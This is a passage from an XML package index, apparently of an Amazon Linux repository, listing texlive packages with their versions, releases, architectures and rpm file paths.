version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-passivetex-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-jknapltx-doc" version="svn19440.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jknapltx-doc-svn19440.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-booktabs" version="svn15878.1.61803" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-booktabs-svn15878.1.61803-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-makeindex-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ntgclass" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ntgclass-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babel-doc" version="svn24756.3.8m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babel-doc-svn24756.3.8m-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifetex-doc" version="svn24853.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifetex-doc-svn24853.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-carlisle" version="svn18258.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-carlisle-svn18258.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eepic-doc" version="svn15878.1.1e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eepic-doc-svn15878.1.1e-45.amzn1.noarch.rpm</filename></package><package name="texlive-arphic" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arphic-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex-bin" version="svn27344.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-bin-svn27344.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xunicode" version="svn23897.0.981" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xunicode-svn23897.0.981-45.amzn1.noarch.rpm</filename></package><package name="texlive-parallel-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parallel-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ms-doc" version="svn24467.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ms-doc-svn24467.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-memoir-doc" version="svn21638.3.6j_patch_6.0g" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-memoir-doc-svn21638.3.6j_patch_6.0g-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdfpages-doc" version="svn27574.0.4t" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdfpages-doc-svn27574.0.4t-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-bin" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-bin-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ms" version="svn24467.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ms-svn24467.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xtab-doc" version="svn23347.2.3f" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xtab-doc-svn23347.2.3f-45.amzn1.noarch.rpm</filename></package><package name="texlive-pspicture-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pspicture-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-tibetan-doc" version="svn28847.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-tibetan-doc-svn28847.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncctools" version="svn15878.3.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncctools-svn15878.3.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifetex" version="svn24853.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifetex-svn24853.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-pstricks" version="svn17055.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-pstricks-svn17055.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx" version="svn26765.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-svn26765.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-doc" version="svn28217.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texlive.infra-doc-svn28217.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-varwidth-doc" version="svn24104.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-varwidth-doc-svn24104.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3packages-doc" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3packages-doc-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-algorithms-doc" version="svn15878.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-algorithms-doc-svn15878.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontbook-doc" version="svn23608.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontbook-doc-svn23608.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-footmisc-doc" version="svn23330.5.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-footmisc-doc-svn23330.5.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-index-doc" version="svn24099.4.1beta" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-index-doc-svn24099.4.1beta-45.amzn1.noarch.rpm</filename></package><package name="texlive-unicode-math-doc" version="svn29413.0.7d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unicode-math-doc-svn29413.0.7d-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphenat" version="svn15878.2.3c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyphenat-svn15878.2.3c-45.amzn1.noarch.rpm</filename></package><package name="texlive-polyglossia-doc" version="svn26163.v1.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-polyglossia-doc-svn26163.v1.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-palatino" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-palatino-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beton-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beton-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beamer" version="svn29349.3.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beamer-svn29349.3.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-tree-doc" version="svn24142.1.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-tree-doc-svn24142.1.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-latexrecommended" version="svn25795.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-latexrecommended-svn25795.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-rotating-doc" version="svn16832.2.16b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rotating-doc-svn16832.2.16b-45.amzn1.noarch.rpm</filename></package><package name="texlive-sansmath" version="svn17997.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sansmath-svn17997.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex" version="svn29585.1.40.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-svn29585.1.40.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-showexpl-doc" version="svn27790.v0.3j" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-showexpl-doc-svn27790.v0.3j-45.amzn1.noarch.rpm</filename></package><package name="texlive-tipa" version="svn29349.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tipa-svn29349.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-changebar" version="svn29349.3.5c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changebar-svn29349.3.5c-45.amzn1.noarch.rpm</filename></package><package name="texlive-sepnum" version="svn20186.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sepnum-svn20186.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rcs" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rcs-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-mh-doc" version="svn29420.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mh-doc-svn29420.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cns-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cns-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-latexconfig" version="svn28991.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latexconfig-svn28991.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-charter" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-charter-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-titlesec" version="svn24852.2.10.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titlesec-svn24852.2.10.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-adjustbox" version="svn26555.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-adjustbox-svn26555.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lua-alt-getopt" version="svn29349.0.7.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lua-alt-getopt-svn29349.0.7.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex-doc" version="svn26689.0.70.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatex-doc-svn26689.0.70.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-euler" version="svn17261.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euler-svn17261.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-adjustbox-doc" version="svn26555.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-adjustbox-doc-svn26555.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf-bin" version="svn6898.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-bin-svn6898.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-rotating" version="svn16832.2.16b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rotating-svn16832.2.16b-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-examples-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-examples-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-float" version="svn15878.1.3d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-float-svn15878.1.3d-45.amzn1.noarch.rpm</filename></package><package name="texlive-tocloft" version="svn20084.2.3e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tocloft-svn20084.2.3e-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng-doc" version="svn26689.1.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipng-doc-svn26689.1.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-tex4ht-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-thailatex" version="svn29349.0.5.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thailatex-svn29349.0.5.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-doc" version="svn27907.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-doc-svn27907.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-filecontents-doc" version="svn24250.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filecontents-doc-svn24250.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-plot" version="svn28729.1.44" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-plot-svn28729.1.44-45.amzn1.noarch.rpm</filename></package><package name="texlive-ntgclass-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ntgclass-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eurosym-doc" version="svn17265.1.4_subrfix" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eurosym-doc-svn17265.1.4_subrfix-45.amzn1.noarch.rpm</filename></package><package name="texlive-currfile" version="svn29012.0.7b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-currfile-svn29012.0.7b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mnsymbol" version="svn18651.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mnsymbol-svn18651.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-grad" version="svn15878.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-grad-svn15878.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-psfrag-doc" version="svn15878.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psfrag-doc-svn15878.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-enctex" version="svn28602.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enctex-svn28602.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fmtcount" version="svn28068.2.02" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fmtcount-svn28068.2.02-45.amzn1.noarch.rpm</filename></package><package name="texlive-seminar-doc" version="svn18322.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-seminar-doc-svn18322.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-chngcntr" version="svn17157.1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-chngcntr-svn17157.1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-paralist" version="svn15878.2.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-paralist-svn15878.2.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mptopdf-bin" version="svn18674.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mptopdf-bin-svn18674.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-collection-basic" version="svn26314.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-basic-svn26314.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-hyperref" version="svn28213.6.83m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyperref-svn28213.6.83m-45.amzn1.noarch.rpm</filename></package><package name="texlive-geometry" version="svn19716.5.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-geometry-svn19716.5.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathpazo-doc" version="svn15878.1.003" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathpazo-doc-svn15878.1.003-45.amzn1.noarch.rpm</filename></package><package name="texlive-arabxetex-doc" version="svn17470.v1.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arabxetex-doc-svn17470.v1.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfnfss" version="svn19410.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfnfss-svn19410.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lastpage" version="svn28985.1.2l" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lastpage-svn28985.1.2l-45.amzn1.noarch.rpm</filename></package><package name="texlive-mflogo-doc" version="svn17487.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mflogo-doc-svn17487.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf" version="svn26577.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-svn26577.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-pstricks-doc" version="svn17055.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-pstricks-doc-svn17055.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-colortbl" version="svn25394.v1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-colortbl-svn25394.v1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-doc" version="svn18651.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-doc-svn18651.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-avantgar" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-avantgar-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexconfig" version="svn28819.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexconfig-svn28819.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tocloft-doc" version="svn20084.2.3e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tocloft-doc-svn20084.2.3e-45.amzn1.noarch.rpm</filename></package><package name="texlive-graphics-doc" version="svn25405.1.0o" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-graphics-doc-svn25405.1.0o-45.amzn1.noarch.rpm</filename></package><package name="texlive-cite" version="svn19955.5.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cite-svn19955.5.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-misc" version="svn24955.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-misc-svn24955.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kerkis-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kerkis-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-chngcntr-doc" version="svn17157.1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-chngcntr-doc-svn17157.1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex" version="svn26330.0.9997.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-svn26330.0.9997.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-amscls-doc" version="svn29207.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amscls-doc-svn29207.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-plain" version="svn26647.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-plain-svn26647.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-itrans-doc" version="svn24105.4.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-itrans-doc-svn24105.4.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncntrsbk" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncntrsbk-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-math" version="svn29045.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-math-svn29045.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xltxtra-doc" version="svn19809.0.5e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xltxtra-doc-svn19809.0.5e-45.amzn1.noarch.rpm</filename></package><package name="texlive-metalogo-doc" version="svn18611.0.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metalogo-doc-svn18611.0.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf-doc" version="svn26577.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-doc-svn26577.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsfonts" version="svn29208.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsfonts-svn29208.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifoddpage" version="svn23979.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifoddpage-svn23979.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pxfonts-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pxfonts-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bera-doc" version="svn20031.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bera-doc-svn20031.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-microtype-doc" version="svn29392.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-microtype-doc-svn29392.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-filehook-doc" version="svn24280.0.5d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filehook-doc-svn24280.0.5d-45.amzn1.noarch.rpm</filename></package><package name="texlive-thailatex-doc" version="svn29349.0.5.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thailatex-doc-svn29349.0.5.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-multirow" version="svn17256.1.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multirow-svn17256.1.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-latex" version="svn25030.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-latex-svn25030.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-latex-fonts-doc" version="svn28888.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-fonts-doc-svn28888.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecjk" version="svn28816.3.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecjk-svn28816.3.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-seminar" version="svn18322.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-seminar-svn18322.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-tibetan" version="svn28847.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-tibetan-svn28847.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pspicture" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pspicture-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-plot-doc" version="svn28729.1.44" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-plot-doc-svn28729.1.44-45.amzn1.noarch.rpm</filename></package><package name="texlive-footmisc" version="svn23330.5.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-footmisc-svn23330.5.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-doc" version="svn28792.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kpathsea-doc-svn28792.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beamer-doc" version="svn29349.3.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beamer-doc-svn29349.3.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-lib-devel" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-lib-devel-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xetex-doc" version="svn26330.0.9997.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-doc-svn26330.0.9997.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyph-utf8-doc" version="svn29641.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyph-utf8-doc-svn29641.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-stmaryrd-doc" version="svn22027.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-stmaryrd-doc-svn22027.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucharclasses" version="svn27820.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucharclasses-svn27820.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texconfig" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texconfig-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bidi" version="svn29650.12.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bidi-svn29650.12.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-datetime-doc" version="svn19834.2.58" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-datetime-doc-svn19834.2.58-45.amzn1.noarch.rpm</filename></package><package name="texlive-bera" version="svn20031.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bera-svn20031.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ptext-doc" version="svn28124.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ptext-doc-svn28124.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-crop" version="svn15878.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-crop-svn15878.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyref-doc" version="svn15878.0.9c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyref-doc-svn15878.0.9c-45.amzn1.noarch.rpm</filename></package><package name="texlive-etoolbox" version="svn20922.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etoolbox-svn20922.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifoddpage-doc" version="svn23979.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifoddpage-doc-svn23979.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rsfs" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rsfs-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-epsf" version="svn21461.2.7.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epsf-svn21461.2.7.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks" version="svn29678.2.39" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-svn29678.2.39-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifxetex-doc" version="svn19685.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifxetex-doc-svn19685.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsmath" version="svn29327.2.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsmath-svn29327.2.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontwrap" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontwrap-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-itrans" version="svn24105.4.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-itrans-svn24105.4.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-tree" version="svn24142.1.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-tree-svn24142.1.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-xepersian-doc" version="svn29661.12.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xepersian-doc-svn29661.12.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-doc" version="svn28119.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-doc-svn28119.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-qstest-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-qstest-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-xetex" version="svn29634.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-xetex-svn29634.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-extsizes-doc" version="svn17263.1.4a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-extsizes-doc-svn17263.1.4a-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-def" version="svn22653.0.06d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-def-svn22653.0.06d-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-add" version="svn28750.3.59" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-add-svn28750.3.59-45.amzn1.noarch.rpm</filename></package><package name="texlive-ec" version="svn25033.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ec-svn25033.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-eps-doc" version="svn15878.1.0" 